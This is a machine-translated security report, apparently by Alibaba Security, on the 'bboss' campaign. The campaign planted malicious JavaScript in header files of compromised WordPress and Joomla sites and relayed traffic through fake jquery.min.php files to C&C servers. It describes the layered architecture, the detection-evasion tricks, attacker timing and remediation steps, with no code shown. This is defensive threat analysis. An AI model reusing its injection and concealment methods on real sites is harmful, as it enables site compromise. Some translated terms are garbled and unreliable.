Every day we are wondering, wondering where we are in the world, wondering what the world presents is beyond our cognition. Every day we are pleasantly surprised. What surprises us is the constant new cognition, which always makes us think for a short time that we have a better understanding of the world. The combination of doubt and surprise seems to be the best temptation to human beings, which drives us to explore all the time. The transformation from unknown to known seems to be the only way for us to understand the world. What fascinates us forever is not the unknown, but the next.

1. Report wedge

Remember the end of 2015, when extortion attacks based on the telsacrypt variant (VVV virus) were rampant? Alibaba Security Threat Intelligence Center has detected a large number of such attacks from e-mail. Meanwhile, it is found in the investigation that some customers have not received e-mail and have also been attacked by extortion software. Further follow-up investigation found that the customer was infected by visiting the website of the hanged horse.

Based on the fingerprint detection of Pegasus found in the world, more than 120000 websites with the same characteristics have been found on the Internet. We have investigated the event in depth, and we have noticed that the program architecture system behind the event has been very perfect, reaching the industrial level. Based on the information of base layer and boss layer found from the code structure, it is named bboss Organization (event).

2. Global impact

According to the monitoring data of the whole network as of January 13, bboss organization has been dominant active in the past three months, and the scale of intrusion control website has been expanding. These controlled sites are mainly in Europe and the United States, while Asia and Africa are relatively few, but they have been spreading.

Figure 1 global threat situation of bboss

The United States was the worst hit, accounting for 30%, followed by European countries, with South Korea ranking first among Asian countries, accounting for 4%, while South America, Africa and Australia accounted for the smallest proportion.

Figure 2 global distribution of bboss threats

2.1. Impact site and software

There are more than 120000 infected websites in the world, about 78% of which use open-source CMS framework, mainly WordPress and Joomla, especially WordPress, accounting for 57%.

Figure 3 proportion of software affected by bboss (\ n indicates no CMS software)

3. Bboss technical system

With over 120000 websites under control, the technical system behind bboss is also extremely perfect. It can be seen that the organization has used a multi-layer architecture for more efficient control and easy concealment. At present, it has formed the ability to control large-scale cluster broiler websites.

Figure 4 bboss system technical system

Bboss technology system is roughly divided into four layers, namely JS layer, base layer, keeper layer and boss layer. Each layer of broiler has a clear division of labor and close cooperation. JS layer is a site that directly contacts users. JS is embedded in the page to construct request forwarding traffic to base layer. The base layer will request instructions from the boss layer. After verification, the boss layer will return the attack instructions according to the current attacks, and then send them to the user under the base layer. At the same time, the keeper layer will regularly detect and survive, add, delete, modify and exploit the JS layer and base layer sites.

Figure 5 bboss hierarchical relationship

3.1. JS layer analysis

There are about 100000 websites infected by JS layer in the world, about 85% of which use open-source CMS framework, of which WordPress accounts for 63% and Joomla accounts for 10%.

Fig. 6 cms scale of site in JS layer (\ n means no CMS software)

In recent days, we also pay attention to the report released by PaloAlto netwokrs: "angle exploit kit continua to evode detection: over 90, 000 websites compiled ", compared with the published data, only 11863 domain name matches were found. These websites have weak password or general-purpose vulnerabilities, which are easy to be intruded, which is consistent with the evidence of many different types of webshell found on these websites in this event.

Figure 7 one of the webshell of JS layer

The infected feature of JS layer site is that malicious JS is embedded in its framework head.php, which results in the script when visiting all pages of the site. WordPress based websites are mainly inserted in / WP content / themes / twentyfourteen / header.php through webshell, while Joomla based websites are mainly inserted in / libraries / Joomla / document / HTML / renderer / head.php.

Figure 8 modifying header.php

The malicious JS code is as follows, extracting the title, referer and host information of the current page, constructing the request and sending it to the jquery.min.php file under the base layer domain.

Figure 9 JS layer malicious code

The keeper layer will update the embedded JS in the header.php of the JS layer site from time to time, and the same test shows that it has a certain resistance. When simulating a JS layer site to test the request of the base layer site, if it is detected as a simulation test, the malicious JS implanted under the JS layer site will be temporarily cleared for several days.

3.2. Base layer analysis

The same as JS layer, base layer is still a large number of sites under intrusion control. The relationship between the number of base layer infected and JS layer infected is about 1:5. Different from JS layer, the site of this layer is no longer CMS based, 85% of the sites do not use any CMS, and there are few sites in China. There are too many IIS and Apache sites and a few nginx sites.

Figure 10 cms scale of base level stations

It can be seen that previous attacks started to implant malicious payloads directly in this layer, but bboss is not. The base layer is still just a springboard. The feature of the base layer site is that after being intruded, JS / jquery.min.php and JS / jquery-1.9.1.min.php will be placed in the site directory. These two files use the blind method to make users mistakenly think that they are jquery.min.js and jquery-1.9.1.min.js related to jQuery.

Figure 11 base layer malicious samples

According to the picture, we got the sample of jquery.min.php and unveiled its mystery. Encryption and obfuscation are used in the code. After decryption, it can be seen that it encapsulates the bossapi class, which realizes the communication of C & C in the back-end boss layer and analyzes the response results.

Figure 12 bossapi class

The main program consists of three processes. If the get request parameter is empty, construct a random page under the same domain name, visit and return 404.

Figure 13 get is empty

The C ﹣ UTM process is used to receive the request from the JS layer structure, and randomly forward it to four C & CS in the boss layer. C & C will issue malicious instructions according to the parameters in the request.

Figure 14 flow of C uutm

PI process is mainly used to receive the traffic from keeper layer and forward it to C & C of boss layer for verification. It is used to determine whether the base layer is alive and forged.

Figure 15 PI process

At the same time, it is found that the communication between base layer and boss layer also has some anti investigation strategies. In addition, XOR encryption and decryption class is also included in the code, but it has not been used in the main program.

3.3. Boss layer analysis

Unlike the first two layers, the number of machines infected in the boss layer is much smaller. Up to now, by analyzing several samples of jquery.min.php and jquery.1.9.1.min.php collected from base layer, four active boss layer C & C IP and one idle IP have been obtained. The recent traffic trends of these five IPS are as follows:

Figure 16 flow trend of boss layer

Interestingly, these five IP addresses belong to five different countries, namely, the United States, Russia, Lithuania, France and Indonesia. These independent IP addresses also come from invasion. According to our data, in November 2015, the figure appeared in the VVV blackmail attack, as well as some malicious promotion.

Figure 17 malicious JS distributed at the boss layer

Only when an attack is needed, the boss layer will issue an attack command, and usually only issue a redirection request to redirect to the Google homepage.

Figure 18 normal jump issued by boss layer

3.4. Keeper layer analysis

In addition to the above layers, there is also a keeper layer in the bboss technical architecture. Several keeper layer IPS have been found by the end of this project, which are also distributed in different countries. This layer is mainly used to explore and modify the malicious JS content of JS layer, and to explore the webshell, juqery.min.php and jquery-1.9.1.min.php of base layer. At the same time, it will be accompanied by a series of intrusions, such as violent cracking, weak password guessing, plug-in vulnerability utilization, background upload with back door plug-ins, etc. This paper analyzes the most active IP 85. * *.* *. 78 from UAE in keeper layer, and its traffic trend is as follows:

Figure 19 traffic trend of a zombie keeper

It can be found that the zombie keeper is not working every day, it will have periodic rest and the interval of each rest is different. Therefore, it can be inferred that the keeper is initiated by the attacker rather than automatically. During the period 1226-1229, activities were even stopped for 4 days. At the same time, the request trend of JS layer is basically the same as that of base layer.

Figure 20 matrix analysis of active time of a zombie keeper

According to the active time of the zombie keeper every day in the past month, the above time matrix diagram is drawn, with the horizontal axis as the date and the vertical axis as the hour. Overlapping the data of different days to a day, the more times each hour appears in different days, the darker the color is, so it can be inferred that the attacker's most active time is about 20 o'clock every day until about 8 o'clock the next day. It is obvious that the attacker is not in UTC / GMT + 8 time zone, and after constantly changing time zone to fit the data, it is found that when UTC / gmt-5 time zone is used, not only the most active time conforms to the work and rest rules, but also all other data are surprisingly consistent.

Figure 21 UTC / gmt-5 time zone

This also confirms the aforementioned zombie keeper's inactivity in 1226-1229. In fact, it may be that the attacker went on Christmas vacation in 1225-1228 UTC / gmt-5 time zone.

4. Self inspection method

1. Check whether the foreground page is inserted with JS code of the following types or other exceptions;

2. Check whether the background source code has been modified, especially the above framework files;

3. Check whether abnormal source files, JS directory and jquery.min.php are added in the background;

4. Check whether the site access record has abnormal access such as brute force cracking.

5. Repair suggestions

1. Check whether there are suspicious new users and modify the site password;

2. Clear the new or modified suspicious code;

3. Clean the plug-ins that are no longer used, upgrade CMS and third-party plug-ins to the latest version;

4. Add safety protection measures such as anti violent cracking and WAF;

6. summary

Based on the above analysis and data, it is found that bboss has the following characteristics:

1. Control more than 120000 websites, with global influence;

2. The technical architecture system is highly mature, multi-level and hierarchical, easy to control and hide, and has a strong sense of attack and defense;

3. The business is flexible, highly configurable and updated irregularly;

4. The scope of harm is huge, affecting tens of millions of Internet users.

*Author: Alibaba security (enterprise account), reprint please indicate from freebuf hacker and geek (freebuf. Com)